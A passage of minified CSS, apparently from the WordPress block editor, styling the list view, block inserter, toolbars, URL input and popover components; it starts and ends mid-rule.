td:last-child{border-bottom-right-radius:2px}.block-editor-list-view-leaf.is-branch-selected:not(.is-selected):not(.is-synced-branch){background:rgba(var(--wp-admin-theme-color--rgb),.04)}.block-editor-list-view-leaf.is-synced-branch.is-branch-selected{background:rgba(var(--wp-block-synced-color--rgb),.04)}.block-editor-list-view-leaf.is-branch-selected.is-first-selected td:first-child{border-top-left-radius:2px}.block-editor-list-view-leaf.is-branch-selected.is-first-selected td:last-child{border-top-right-radius:2px}.block-editor-list-view-leaf[data-expanded=false].is-branch-selected.is-first-selected td:first-child{border-top-left-radius:2px}.block-editor-list-view-leaf[data-expanded=false].is-branch-selected.is-first-selected td:last-child{border-top-right-radius:2px}.block-editor-list-view-leaf[data-expanded=false].is-branch-selected.is-last-selected td:first-child{border-bottom-left-radius:2px}.block-editor-list-view-leaf[data-expanded=false].is-branch-selected.is-last-selected td:last-child{border-bottom-right-radius:2px}.block-editor-list-view-leaf.is-branch-selected:not(.is-selected) td{border-radius:0}@media not (prefers-reduced-motion){.block-editor-list-view-leaf.is-displacement-normal{transition:transform .2s}}.block-editor-list-view-leaf.is-displacement-normal{transform:translateY(0)}@media not (prefers-reduced-motion){.block-editor-list-view-leaf.is-displacement-up{transition:transform .2s}}.block-editor-list-view-leaf.is-displacement-up{transform:translateY(-32px)}@media not (prefers-reduced-motion){.block-editor-list-view-leaf.is-displacement-down{transition:transform .2s}}.block-editor-list-view-leaf.is-displacement-down{transform:translateY(32px)}@media not (prefers-reduced-motion){.block-editor-list-view-leaf.is-after-dragged-blocks{transition:transform .2s}}.block-editor-list-view-leaf.is-after-dragged-blocks{transform:translateY(calc(var(--wp-admin--list-view-dragged-items-height, 32px)*-1))}@media not (prefers-reduced-motion){.block-editor-list-view-leaf.is-after-dragged-blocks.is-displacement-up{transition:transform .2s}}.block-editor-list-view-leaf.is-after-dragged-blocks.is-displacement-up{transform:translateY(calc(-32px + var(--wp-admin--list-view-dragged-items-height, 32px)*-1))}@media not (prefers-reduced-motion){.block-editor-list-view-leaf.is-after-dragged-blocks.is-displacement-down{transition:transform .2s}}.block-editor-list-view-leaf.is-after-dragged-blocks.is-displacement-down{transform:translateY(calc(32px + var(--wp-admin--list-view-dragged-items-height, 32px)*-1))}.block-editor-list-view-leaf.is-dragging{left:0;opacity:0;pointer-events:none;z-index:-9999}.block-editor-list-view-leaf .block-editor-list-view-block-contents{align-items:center;border-radius:2px;box-sizing:border-box;color:inherit;display:flex;font-family:inherit;font-size:13px;font-weight:400;height:32px;margin:0;padding:6px 4px 6px 0;position:relative;text-align:left;text-decoration:none;white-space:nowrap;width:100%}@media not (prefers-reduced-motion){.block-editor-list-view-leaf .block-editor-list-view-block-contents{transition:box-shadow .1s linear}}.components-modal__content .block-editor-list-view-leaf .block-editor-list-view-block-contents{padding-left:0;padding-right:0}.block-editor-list-view-leaf .block-editor-list-view-block-contents:focus,.block-editor-list-view-leaf.is-nesting .block-editor-list-view-block-contents{box-shadow:none}.block-editor-list-view-leaf .block-editor-list-view-block-contents:focus:after,.block-editor-list-view-leaf.is-nesting .block-editor-list-view-block-contents:after{border-radius:inherit;bottom:0;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);content:"";left:0;pointer-events:none;position:absolute;right:-29px;top:0;z-index:2}.block-editor-list-view-leaf.has-single-cell .block-editor-list-view-block-contents:focus:after{right:0}.block-editor-list-view-leaf .block-editor-list-view-block__menu:focus,.block-editor-list-view-leaf.is-nesting .block-editor-list-view__menu{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);z-index:1}.block-editor-list-view-leaf.is-visible .block-editor-list-view-block-contents{opacity:1}@keyframes __wp-base-styles-fade-in{0%{opacity:0}to{opacity:1}}@media not (prefers-reduced-motion){.block-editor-list-view-leaf.is-visible .block-editor-list-view-block-contents{animation:__wp-base-styles-fade-in .08s linear 0s;animation-fill-mode:forwards}}.block-editor-list-view-leaf .block-editor-block-icon{flex:0 0 24px;margin-right:4px}.block-editor-list-view-leaf .block-editor-list-view-block__contents-cell,.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell{padding:0}.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell{line-height:0;vertical-align:middle;width:28px}.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell>*,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell>*{opacity:0}.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell.is-visible>*,.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell:focus-within>*,.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell:hover>*,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell.is-visible>*,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell:focus-within>*,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell:hover>*{opacity:1}.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell-alignment-wrapper{align-items:center;display:flex;flex-direction:column;height:100%}.block-editor-list-view-leaf .block-editor-block-mover-button{height:24px;position:relative;width:36px}.block-editor-list-view-leaf .block-editor-block-mover-button svg{height:24px;position:relative}.block-editor-list-view-leaf .block-editor-block-mover-button.is-up-button{align-items:flex-end;margin-top:-6px}.block-editor-list-view-leaf .block-editor-block-mover-button.is-up-button svg{bottom:-4px}.block-editor-list-view-leaf .block-editor-block-mover-button.is-down-button{align-items:flex-start;margin-bottom:-6px}.block-editor-list-view-leaf .block-editor-block-mover-button.is-down-button svg{top:-4px}.block-editor-list-view-leaf .block-editor-block-mover-button:before{height:16px;left:0;min-width:100%;right:0}.block-editor-list-view-leaf .block-editor-inserter__toggle{background:#1e1e1e;color:#fff;height:24px;margin:6px 6px 6px 1px;min-width:24px}.block-editor-list-view-leaf .block-editor-inserter__toggle:active{color:#fff}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__label-wrapper svg{left:2px;position:relative}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__title{flex:1;position:relative}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__title .components-truncate{position:absolute;transform:translateY(-50%);width:100%}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__anchor-wrapper{max-width:min(110px,40%);position:relative;width:100%}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__anchor{position:absolute;right:0;transform:translateY(-50%)}.block-editor-list-view-leaf.is-selected .block-editor-list-view-block-select-button__anchor{background:#0000004d;color:#fff}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__block-visibility,.block-editor-list-view-leaf .block-editor-list-view-block-select-button__lock,.block-editor-list-view-leaf .block-editor-list-view-block-select-button__sticky{line-height:0}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__images{display:flex}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__image{background-size:cover;border-radius:1px;height:18px;width:18px}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__image:not(:only-child){box-shadow:0 0 0 2px #fff}.block-editor-list-view-leaf .block-editor-list-view-block-select-button__image:not(:first-child){margin-left:-6px}.block-editor-list-view-leaf.is-selected .block-editor-list-view-block-select-button__image:not(:only-child){box-shadow:0 0 0 2px var(--wp-admin-theme-color)}.block-editor-list-view-draggable-chip{opacity:.8}.block-editor-list-view-appender__cell .block-editor-list-view-appender__container,.block-editor-list-view-appender__cell .block-editor-list-view-block__contents-container,.block-editor-list-view-block__contents-cell .block-editor-list-view-appender__container,.block-editor-list-view-block__contents-cell .block-editor-list-view-block__contents-container{display:flex}.block-editor-list-view__expander{cursor:pointer;height:24px;width:24px}.block-editor-list-view-leaf[aria-level] .block-editor-list-view__expander{margin-left:192px}.block-editor-list-view-leaf[aria-level="1"] .block-editor-list-view__expander{margin-left:0}.block-editor-list-view-leaf[aria-level="2"] .block-editor-list-view__expander{margin-left:24px}.block-editor-list-view-leaf[aria-level="3"] .block-editor-list-view__expander{margin-left:48px}.block-editor-list-view-leaf[aria-level="4"] .block-editor-list-view__expander{margin-left:72px}.block-editor-list-view-leaf[aria-level="5"] .block-editor-list-view__expander{margin-left:96px}.block-editor-list-view-leaf[aria-level="6"] .block-editor-list-view__expander{margin-left:120px}.block-editor-list-view-leaf[aria-level="7"] .block-editor-list-view__expander{margin-left:144px}.block-editor-list-view-leaf[aria-level="8"] .block-editor-list-view__expander{margin-left:168px}.block-editor-list-view-leaf .block-editor-list-view__expander{visibility:hidden}.block-editor-list-view-leaf[data-expanded=true] .block-editor-list-view__expander svg{visibility:visible}@media not (prefers-reduced-motion){.block-editor-list-view-leaf[data-expanded=true] .block-editor-list-view__expander svg{transition:transform .2s ease}}.block-editor-list-view-leaf[data-expanded=true] .block-editor-list-view__expander svg{transform:rotate(90deg)}.block-editor-list-view-leaf[data-expanded=false] .block-editor-list-view__expander svg{transform:rotate(0deg);visibility:visible}@media not (prefers-reduced-motion){.block-editor-list-view-leaf[data-expanded=false] .block-editor-list-view__expander svg{transition:transform .2s ease}}.block-editor-list-view-drop-indicator{pointer-events:none}.block-editor-list-view-drop-indicator .block-editor-list-view-drop-indicator__line{background:var(--wp-admin-theme-color);border-radius:4px;height:4px}.block-editor-list-view-drop-indicator--preview{pointer-events:none}.block-editor-list-view-drop-indicator--preview .components-popover__content{overflow:hidden!important}.block-editor-list-view-drop-indicator--preview .block-editor-list-view-drop-indicator__line{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-radius:4px;height:32px;overflow:hidden}.block-editor-list-view-drop-indicator--preview .block-editor-list-view-drop-indicator__line--darker{background:rgba(var(--wp-admin-theme-color--rgb),.09)}.block-editor-list-view-placeholder{height:32px;margin:0;padding:0}.list-view-appender .block-editor-inserter__toggle{background-color:#1e1e1e;color:#fff;height:24px;margin:8px 0 0 24px;padding:0}.list-view-appender .block-editor-inserter__toggle.has-icon.is-next-40px-default-size{min-width:24px}.list-view-appender .block-editor-inserter__toggle:focus,.list-view-appender .block-editor-inserter__toggle:hover{background:var(--wp-admin-theme-color);color:#fff}.list-view-appender__description{display:none}.block-editor-media-placeholder__url-input-form{min-width:260px}@media (min-width:600px){.block-editor-media-placeholder__url-input-form{width:300px}}.block-editor-media-placeholder__url-input-form input{direction:ltr}.modal-open .block-editor-media-replace-flow__options{display:none}.block-editor-media-replace-flow__indicator{margin-left:4px}.block-editor-media-replace-flow__media-upload-menu:not(:empty)+.block-editor-media-flow__url-input{border-top:1px solid #1e1e1e;margin-top:8px;padding-bottom:8px}.block-editor-media-flow__url-input{margin-left:-8px;margin-right:-8px;padding:16px}.block-editor-media-flow__url-input .block-editor-media-replace-flow__image-url-label{display:block;margin-bottom:8px;top:16px}.block-editor-media-flow__url-input .block-editor-link-control{width:300px}.block-editor-media-flow__url-input .block-editor-link-control .block-editor-url-input{margin:0;padding:0}.block-editor-media-flow__url-input .block-editor-link-control .block-editor-link-control__tools{justify-content:flex-end;padding:16px var(--wp-admin-border-width-focus) var(--wp-admin-border-width-focus)}.block-editor-media-flow__url-input .block-editor-link-control .block-editor-link-control__search-item.is-current{padding:0;width:auto}.block-editor-media-flow__url-input .block-editor-link-control .block-editor-link-control__search-input.block-editor-link-control__search-input input[type=text]{margin:0;width:100%}.block-editor-media-flow__url-input .block-editor-link-control .block-editor-link-control__search-actions{padding:8px 0 0}.block-editor-media-flow__error{max-width:255px;padding:0 20px 20px}.block-editor-media-flow__error .components-with-notices-ui{max-width:255px}.block-editor-media-flow__error .components-with-notices-ui .components-notice__content{overflow:hidden;word-wrap:break-word}.block-editor-media-flow__error .components-with-notices-ui .components-notice__dismiss{position:absolute;right:10px}.block-editor-multi-selection-inspector__card{padding:16px}.block-editor-multi-selection-inspector__card-title{font-weight:500}.block-editor-multi-selection-inspector__card .block-editor-block-icon{height:24px;margin-left:-2px;padding:0 3px;width:36px}.block-editor-responsive-block-control{border-bottom:1px solid #ccc;margin-bottom:28px;padding-bottom:14px}.block-editor-responsive-block-control:last-child{border-bottom:0;padding-bottom:0}.block-editor-responsive-block-control__title{margin:0 0 .6em -3px}.block-editor-responsive-block-control__label{font-weight:600;margin-bottom:.6em;margin-left:-3px}.block-editor-responsive-block-control__inner{margin-left:-1px}.block-editor-responsive-block-control__toggle{margin-left:1px}.block-editor-responsive-block-control .components-base-control__help{border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal!important}.components-popover.block-editor-rich-text__inline-format-toolbar{z-index:99998}.components-popover.block-editor-rich-text__inline-format-toolbar .components-popover__content{border-radius:2px;box-shadow:none;margin-bottom:8px;min-width:auto;outline:none;width:auto}.components-popover.block-editor-rich-text__inline-format-toolbar .components-toolbar{border-radius:2px}.components-popover.block-editor-rich-text__inline-format-toolbar .components-toolbar-group{background:none}.components-popover.block-editor-rich-text__inline-format-toolbar .components-dropdown-menu__toggle,.components-popover.block-editor-rich-text__inline-format-toolbar .components-toolbar__control{min-height:48px;min-width:48px;padding-left:12px;padding-right:12px}.block-editor-rich-text__inline-format-toolbar-group .components-dropdown-menu__toggle{justify-content:center}.show-icon-labels .block-editor-rich-text__inline-format-toolbar-group .components-button.has-icon{width:auto}.show-icon-labels .block-editor-rich-text__inline-format-toolbar-group .components-button.has-icon svg{display:none}.show-icon-labels .block-editor-rich-text__inline-format-toolbar-group .components-button.has-icon:after{content:attr(aria-label)}.block-editor-skip-to-selected-block{position:absolute;top:-9999em}.block-editor-skip-to-selected-block:focus{background:#f1f1f1;font-size:14px;font-weight:600;z-index:100000}.block-editor-tabbed-sidebar{background-color:#fff;display:flex;flex-direction:column;flex-grow:1;height:100%;overflow:hidden}.block-editor-tabbed-sidebar__tablist-and-close-button{border-bottom:1px solid #ddd;display:flex;justify-content:space-between;padding-right:8px}.block-editor-tabbed-sidebar__close-button{align-self:center;background:#fff;order:1}.block-editor-tabbed-sidebar__tablist{margin-bottom:-1px}.block-editor-tabbed-sidebar__tabpanel{display:flex;flex-direction:column;flex-grow:1;overflow-y:auto;scrollbar-gutter:auto}.block-editor-block-list__block .block-editor-url-input,.block-editor-url-input,.components-popover .block-editor-url-input{flex-grow:1;padding:1px;position:relative}@media (min-width:600px){.block-editor-block-list__block .block-editor-url-input,.block-editor-url-input,.components-popover .block-editor-url-input{min-width:300px;width:auto}}.block-editor-block-list__block .block-editor-url-input.is-full-width,.block-editor-block-list__block .block-editor-url-input.is-full-width__suggestions,.block-editor-url-input.is-full-width,.block-editor-url-input.is-full-width__suggestions,.components-popover .block-editor-url-input.is-full-width,.components-popover .block-editor-url-input.is-full-width__suggestions{width:100%}.block-editor-block-list__block .block-editor-url-input .components-spinner,.block-editor-url-input .components-spinner,.components-popover .block-editor-url-input .components-spinner{margin:0;position:absolute;right:8px;top:calc(50% - 8px)}.block-editor-url-input__suggestions{max-height:200px}@media not (prefers-reduced-motion){.block-editor-url-input__suggestions{transition:all .15s ease-in-out}}.block-editor-url-input__suggestions{overflow-y:auto;padding:4px 0;width:302px}.block-editor-url-input .components-spinner,.block-editor-url-input__suggestions{display:none}@media (min-width:600px){.block-editor-url-input .components-spinner,.block-editor-url-input__suggestions{display:grid}}.block-editor-url-input__suggestion{background:#fff;border:none;box-shadow:none;color:#757575;cursor:pointer;display:block;font-size:13px;height:auto;min-height:36px;text-align:left;width:100%}.block-editor-url-input__suggestion:hover{background:#ddd}.block-editor-url-input__suggestion.is-selected,.block-editor-url-input__suggestion:focus{background:var(--wp-admin-theme-color-darker-20);color:#fff;outline:none}.components-toolbar-group>.block-editor-url-input__button,.components-toolbar>.block-editor-url-input__button{position:inherit}.block-editor-url-input__button .block-editor-url-input__back{margin-right:4px;overflow:visible}.block-editor-url-input__button .block-editor-url-input__back:after{background:#ddd;content:"";display:block;height:24px;position:absolute;right:-1px;width:1px}.block-editor-url-input__button-modal{background:#fff;border:1px solid #ddd;box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003}.block-editor-url-input__button-modal-line{align-items:flex-start;display:flex;flex-direction:row;flex-grow:1;flex-shrink:1;min-width:0}.block-editor-url-popover__additional-controls{border-top:1px solid #1e1e1e;padding:8px}.block-editor-url-popover__input-container{padding:8px}.block-editor-url-popover__row{align-items:center;display:flex;gap:4px}.block-editor-url-popover__row>:not(.block-editor-url-popover__settings-toggle){flex-grow:1;gap:8px}.block-editor-url-popover__additional-controls .components-button.has-icon{height:auto;padding-left:8px;padding-right:8px;text-align:left}.block-editor-url-popover__additional-controls .components-button.has-icon>svg{margin-right:8px}.block-editor-url-popover__settings-toggle{flex-shrink:0}.block-editor-url-popover__settings-toggle[aria-expanded=true] .dashicon{transform:rotate(180deg)}.block-editor-url-popover__settings{border-top:1px solid #1e1e1e;display:block;padding:16px}.block-editor-url-popover__link-editor,.block-editor-url-popover__link-viewer{display:flex}.block-editor-url-popover__link-viewer-url{align-items:center;display:flex;flex-grow:1;flex-shrink:1;margin-right:8px;max-width:350px;min-width:150px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.block-editor-url-popover__link-viewer-url.has-invalid-link{color:#cc1818}.block-editor-url-popover__expand-on-click{align-items:center;display:flex;min-width:350px;white-space:nowrap}.block-editor-url-popover__expand-on-click .text{flex-grow:1}.block-editor-url-popover__expand-on-click .text p{line-height:16px;margin:0}.block-editor-url-popover__expand-on-click .text p.description{color:#757575;font-size:12px}.block-editor-hooks__block-hooks .components-toggle-control .components-h-stack .components-h-stack{flex-direction:row}.block-editor-hooks__block-hooks .block-editor-hooks__block-hooks-helptext{color:#757575;font-size:12px;margin-bottom:16px}div.block-editor-bindings__panel{grid-template-columns:repeat(auto-fit,minmax(100%,1fr))}div.block-editor-bindings__panel button:hover .block-editor-bindings__item span{color:inherit}.border-block-support-panel .single-column{grid-column:span 1}.color-block-support-panel .block-editor-contrast-checker{grid-column:span 2;margin-top:16px}.color-block-support-panel .block-editor-contrast-checker .components-notice__content{margin-right:0}.color-block-support-panel.color-block-support-panel .color-block-support-panel__inner-wrapper{row-gap:0}.color-block-support-panel .block-editor-tools-panel-color-gradient-settings__item.first{margin-top:0}.dimensions-block-support-panel .single-column{grid-column:span 1}.block-editor-hooks__layout-constrained .components-base-control{margin-bottom:0}.block-editor-hooks__layout-constrained-helptext{color:#757575;font-size:12px;margin-bottom:0}.block-editor-hooks__flex-layout-justification-controls,.block-editor-hooks__flex-layout-orientation-controls{margin-bottom:12px}.block-editor-hooks__flex-layout-justification-controls legend,.block-editor-hooks__flex-layout-orientation-controls legend{margin-bottom:8px}.block-editor-hooks__grid-layout-columns-and-rows-controls,.block-editor-hooks__grid-layout-minimum-width-control{border:0;margin:0;padding:0}.block-editor__spacing-visualizer{border-color:var(--wp-admin-theme-color);border-style:solid;bottom:0;box-sizing:border-box;left:0;opacity:.5;pointer-events:none;position:absolute;right:0;top:0}.typography-block-support-panel .single-column{grid-column:span 1}.block-editor-block-toolbar{display:flex;flex-grow:1;overflow-x:auto;overflow-y:hidden;position:relative;width:100%}@media not (prefers-reduced-motion){.block-editor-block-toolbar{transition:border-color .1s linear,box-shadow .1s linear}}@media (min-width:600px){.block-editor-block-toolbar{overflow:inherit}}.block-editor-block-toolbar .components-toolbar,.block-editor-block-toolbar .components-toolbar-group{background:none;border:0;border-right:1px solid #ddd;margin-bottom:-1px;margin-top:-1px}.block-editor-block-toolbar.is-connected .block-editor-block-switcher .components-button:before{background:color-mix(in srgb,var(--wp-block-synced-color) 10%,#0000);border-radius:2px}.block-editor-block-toolbar.is-connected .block-editor-block-switcher .components-button .block-editor-block-icon,.block-editor-block-toolbar.is-connected .block-editor-block-switcher__no-switcher-icon[aria-disabled=true] .block-editor-block-icon,.block-editor-block-toolbar.is-synced .block-editor-block-switcher .components-button .block-editor-block-icon,.block-editor-block-toolbar.is-synced .block-editor-block-switcher__no-switcher-icon[aria-disabled=true] .block-editor-block-icon{color:var(--wp-block-synced-color)}.block-editor-block-toolbar:has(>:last-child:empty)>:nth-last-child(2),.block-editor-block-toolbar:has(>:last-child:empty)>:nth-last-child(2) .components-toolbar,.block-editor-block-toolbar:has(>:last-child:empty)>:nth-last-child(2) .components-toolbar-group,.block-editor-block-toolbar>:last-child,.block-editor-block-toolbar>:last-child .components-toolbar,.block-editor-block-toolbar>:last-child .components-toolbar-group{border-right:none}.block-editor-block-toolbar .components-toolbar-group:empty{display:none}.block-editor-block-contextual-toolbar{background-color:#fff;display:block;flex-shrink:3;position:sticky;top:0;width:100%;z-index:31}.block-editor-block-contextual-toolbar.components-accessible-toolbar{border:none;border-radius:0}.block-editor-block-contextual-toolbar.is-unstyled{box-shadow:0 1px 0 0 rgba(0,0,0,.133)}.block-editor-block-contextual-toolbar .block-editor-block-toolbar{overflow:auto;overflow-y:hidden}.block-editor-block-contextual-toolbar .block-editor-block-toolbar::-webkit-scrollbar{height:12px;width:12px}.block-editor-block-contextual-toolbar .block-editor-block-toolbar::-webkit-scrollbar-track{background-color:initial}.block-editor-block-contextual-toolbar .block-editor-block-toolbar::-webkit-scrollbar-thumb{background-clip:padding-box;background-color:#e0e0e0;border:3px solid #0000;border-radius:8px}.block-editor-block-contextual-toolbar .block-editor-block-toolbar:focus-within::-webkit-scrollbar-thumb,.block-editor-block-contextual-toolbar .block-editor-block-toolbar:focus::-webkit-scrollbar-thumb,.block-editor-block-contextual-toolbar .block-editor-block-toolbar:hover::-webkit-scrollbar-thumb{background-color:#949494}.block-editor-block-contextual-toolbar .block-editor-block-toolbar{scrollbar-color:#e0e0e0 #0000;scrollbar-gutter:stable both-edges;scrollbar-width:thin}.block-editor-block-contextual-toolbar .block-editor-block-toolbar:focus,.block-editor-block-contextual-toolbar .block-editor-block-toolbar:focus-within,.block-editor-block-contextual-toolbar .block-editor-block-toolbar:hover{scrollbar-color:#949494 #0000}.block-editor-block-contextual-toolbar .block-editor-block-toolbar{will-change:transform}@media (hover:none){.block-editor-block-contextual-toolbar .block-editor-block-toolbar{scrollbar-color:#949494 #0000}}.block-editor-block-contextual-toolbar .block-editor-block-toolbar{scrollbar-gutter:auto}.block-editor-block-contextual-toolbar .block-editor-block-toolbar>:last-child .components-toolbar-group:after,.block-editor-block-contextual-toolbar .block-editor-block-toolbar>:last-child .components-toolbar:after,.block-editor-block-contextual-toolbar .block-editor-block-toolbar>:last-child:after{display:none}.block-editor-block-contextual-toolbar>.block-editor-block-toolbar{flex-grow:0;width:auto}.block-editor-block-contextual-toolbar .block-editor-block-parent-selector{margin-bottom:-1px;margin-top:-1px;position:relative}.block-editor-block-contextual-toolbar .block-editor-block-parent-selector:after{align-items:center;background-color:#1e1e1e;border-radius:100%;content:"";display:inline-flex;height:2px;position:absolute;right:0;top:15px;width:2px}.block-editor-block-toolbar__block-controls .block-editor-block-switcher .components-dropdown-menu__toggle .block-editor-block-icon,.block-editor-block-toolbar__block-controls .block-editor-block-switcher__no-switcher-icon .block-editor-block-icon{margin:0!important;width:24px!important}.block-editor-block-toolbar__block-controls .components-toolbar-group{padding:0}.block-editor-block-toolbar .components-toolbar,.block-editor-block-toolbar .components-toolbar-group,.block-editor-rich-text__inline-format-toolbar-group .components-toolbar,.block-editor-rich-text__inline-format-toolbar-group .components-toolbar-group{display:flex;flex-wrap:nowrap}.block-editor-block-toolbar__slot{display:inline-flex}.show-icon-labels .block-editor-block-toolbar .components-button.has-icon:where(:not(.has-text)){width:auto}.show-icon-labels .block-editor-block-toolbar .components-button.has-icon:where(:not(.has-text)) svg{display:none}.show-icon-labels .block-editor-block-toolbar .components-button.has-icon:where(:not(.has-text)):after{content:attr(aria-label);font-size:12px}.show-icon-labels .components-accessible-toolbar .components-toolbar-group>div:first-child:last-child>.components-button.has-icon{padding-left:6px;padding-right:6px}.show-icon-labels .block-editor-block-switcher .components-dropdown-menu__toggle .block-editor-block-icon,.show-icon-labels .block-editor-block-switcher__no-switcher-icon .block-editor-block-icon{height:0!important;min-width:0!important;width:0!important}.show-icon-labels .block-editor-block-parent-selector .block-editor-block-parent-selector__button{border-bottom-right-radius:0;border-top-right-radius:0;padding-left:12px;padding-right:12px;text-wrap:nowrap}.show-icon-labels .block-editor-block-parent-selector .block-editor-block-parent-selector__button .block-editor-block-icon{width:0}.show-icon-labels .block-editor-block-mover .block-editor-block-mover__move-button-container{position:relative;width:auto}@media (min-width:600px){.show-icon-labels .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container:before{background:#e0e0e0;content:"";height:1px;left:50%;margin-top:-.5px;position:absolute;top:50%;transform:translate(-50%);width:100%}}@media (min-width:782px){.show-icon-labels .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container:before{background:#1e1e1e}}.show-icon-labels .block-editor-block-mover.is-horizontal .block-editor-block-mover-button,.show-icon-labels .block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container{padding-left:6px;padding-right:6px}.show-icon-labels .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover-button{padding-left:8px;padding-right:8px}.show-icon-labels .block-editor-block-toolbar__block-controls .block-editor-block-mover{border-left:1px solid #ddd;margin-left:6px;margin-right:-6px;white-space:nowrap}.show-icon-labels .block-editor-block-mover .block-editor-block-mover__drag-handle.has-icon{padding-left:12px;padding-right:12px}.show-icon-labels .block-editor-block-contextual-toolbar .block-editor-block-mover.is-horizontal .block-editor-block-mover-button.block-editor-block-mover-button{width:auto}.show-icon-labels .components-toolbar,.show-icon-labels .components-toolbar-group{flex-shrink:1}.show-icon-labels .block-editor-rich-text__inline-format-toolbar-group .components-button+.components-button{margin-left:6px}.block-editor-block-toolbar-change-design-content-wrapper{padding:12px;width:320px}.block-editor-block-toolbar-change-design-content-wrapper .block-editor-block-patterns-list{display:grid;grid-template-columns:1fr 1fr;grid-gap:12px}.block-editor-block-toolbar-change-design-content-wrapper .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{margin-bottom:0}.block-editor-block-toolbar-change-design-content-wrapper .block-editor-block-patterns-list .block-editor-inserter__media-list__list-item{min-height:100px}.block-editor-inserter{background:none;border:none;display:inline-block;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;line-height:0;padding:0}@media (min-width:782px){.block-editor-inserter{position:relative}}.block-editor-inserter__main-area{gap:16px;height:100%;position:relative}.block-editor-inserter__main-area.show-as-tabs{gap:0}@media (min-width:782px){.block-editor-inserter__main-area .block-editor-tabbed-sidebar{width:350px}}.block-editor-inserter__popover.is-quick .components-popover__content{border:none;box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003;outline:none}.block-editor-inserter__popover.is-quick .components-popover__content .block-editor-inserter__quick-inserter>*{border-left:1px solid #ccc;border-right:1px solid #ccc}.block-editor-inserter__popover.is-quick .components-popover__content .block-editor-inserter__quick-inserter>:first-child{border-radius:4px 4px 0 0;border-top:1px solid #ccc}.block-editor-inserter__popover.is-quick .components-popover__content .block-editor-inserter__quick-inserter>:last-child{border-bottom:1px solid #ccc;border-radius:0 0 4px 4px}.block-editor-inserter__popover.is-quick .components-popover__content .block-editor-inserter__quick-inserter>.components-button{border:1px solid #1e1e1e}.block-editor-inserter__popover .block-editor-inserter__menu{margin:-12px}.block-editor-inserter__popover .block-editor-inserter__menu .block-editor-inserter__tablist{top:60px}.block-editor-inserter__popover .block-editor-inserter__menu .block-editor-inserter__main-area{height:auto;overflow:visible}.block-editor-inserter__popover .block-editor-inserter__menu .block-editor-inserter__preview-container{display:none}.block-editor-inserter__toggle.components-button{align-items:center;border:none;cursor:pointer;display:inline-flex;outline:none;padding:0}@media not (prefers-reduced-motion){.block-editor-inserter__toggle.components-button{transition:color .2s ease}}.block-editor-inserter__menu{height:100%;overflow:visible;position:relative}@media (min-width:782px){.block-editor-inserter__menu.show-panel{width:630px}}.block-editor-inserter__inline-elements{margin-top:-1px}.block-editor-inserter__menu.is-bottom:after{border-bottom-color:#fff}.components-popover.block-editor-inserter__popover{z-index:99999}.block-editor-inserter__search{padding:16px 16px 0}.block-editor-inserter__no-tab-container{flex-grow:1;overflow-y:auto;position:relative}.block-editor-inserter__panel-header{align-items:center;display:inline-flex;padding:16px 16px 0;position:relative}.block-editor-inserter__panel-content{padding:16px}.block-editor-inserter__panel-title,.block-editor-inserter__panel-title button{color:#757575;font-size:11px;font-weight:500;margin:0 12px 0 0;text-transform:uppercase}.block-editor-inserter__panel-dropdown select.components-select-control__input.components-select-control__input.components-select-control__input{height:36px;line-height:36px}.block-editor-inserter__panel-dropdown select{border:none}.block-editor-inserter__reusable-blocks-panel{position:relative;text-align:right}.block-editor-inserter__no-results,.block-editor-inserter__patterns-loading{padding:32px;text-align:center}.block-editor-inserter__child-blocks{padding:0 16px}.block-editor-inserter__parent-block-header{align-items:center;display:flex}.block-editor-inserter__parent-block-header h2{font-size:13px}.block-editor-inserter__parent-block-header .block-editor-block-icon{margin-right:8px}.block-editor-inserter__preview-container__popover{top:16px!important}.block-editor-inserter__preview-container{display:none;max-height:calc(100% - 32px);overflow-y:hidden;padding:16px;width:280px}@media (min-width:782px){.block-editor-inserter__preview-container{display:block}}.block-editor-inserter__preview-container .block-editor-inserter__media-list__list-item{height:100%}.block-editor-inserter__preview-container .block-editor-block-card{padding-bottom:4px;padding-left:0;padding-right:0}.block-editor-inserter__insertable-blocks-at-selection{border-bottom:1px solid #e0e0e0}.block-editor-inserter__block-patterns-tabs-container,.block-editor-inserter__media-tabs-container{display:flex;flex-direction:column;flex-grow:1;justify-content:space-between;padding:16px}.block-editor-inserter__category-tablist{margin-bottom:8px}.block-editor-inserter__category-panel{display:flex;flex-direction:column;outline:1px solid #0000;padding:0 16px}@media 